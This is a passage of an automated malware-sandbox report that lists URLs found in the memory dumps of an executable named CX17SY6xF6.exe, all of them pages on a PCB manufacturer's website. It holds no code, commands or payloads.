                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-assembly-quote/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-design-quote/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-production-quote/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/stencil-quote/
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/s
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/an-introduction-to-high-density-interconnect-hdi-pcbs/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/components-parts/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/customized-cable/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/enclosure/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/fpc-flexible-printed-circuits/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/hdipcb/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/myro-intelligent-cloud-forehead-thermometer/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-capabilities/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-design-layout/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-restoration/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcba-services/
